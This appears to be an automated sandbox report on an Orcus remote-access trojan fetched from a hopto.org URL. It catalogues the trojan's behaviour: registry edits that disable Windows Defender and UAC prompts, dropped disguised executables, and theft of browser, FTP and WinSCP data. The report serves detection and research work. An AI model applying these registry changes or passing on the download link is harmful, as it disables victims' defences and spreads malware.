Analysis Overview
Threat Level: Known bad
The file https://njratnik667.hopto.org/1.exe was found to be: Known bad.
Malicious Activity Summary
Orcus
Orcus family
Modifies Windows Defender Real-time Protection settings
UAC bypass
Contains code to disable Windows Defender
Orcurs Rat Executable
Command and Scripting Interpreter: PowerShell
Windows security modification
Reads WinSCP keys stored on the system
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Hijack Execution Flow: Executable Installer File Permissions Weakness
Looks up external IP address via web service
Checks whether UAC is enabled
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Subvert Trust Controls: Mark-of-the-Web Bypass
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
NTFS ADS
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Modifies data under HKEY_USERS
System policy modification
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-01-14 20:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-14 20:36
Reported
2025-01-14 20:39
Platform
win11-20241007-en
Max time kernel
177s
Max time network
178s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\dllhost.exe | N/A |
Orcus
Orcus family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Windows\dllhost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Hijack Execution Flow: Executable Installer File Permissions Weakness
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" | C:\Windows\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.DXGI.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.InstallState | C:\Windows\SysWOW64\WindowsInput.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.Direct3D11.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.Direct3D9.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\TurboJpegWrapper.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\x86\turbojpeg.dll | C:\Windows\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsInput.exe.config | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File opened for modification | C:\Windows\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File created | C:\Windows\dllhost.exe.config | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| File opened for modification | C:\Windows\dllhost.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\dllhost.exe.config | C:\Windows\system32\attrib.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\1.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SAVER.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\Taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\Taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\Taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\dllhost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133813606234500201" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Downloads\1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\1.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" | C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" | C:\Windows\dllhost.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://njratnik667.hopto.org/1.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8fa0fcc40,0x7ff8fa0fcc4c,0x7ff8fa0fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1824 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1992,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2004 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2044,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2324 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4384,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3744 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4572,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4532,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
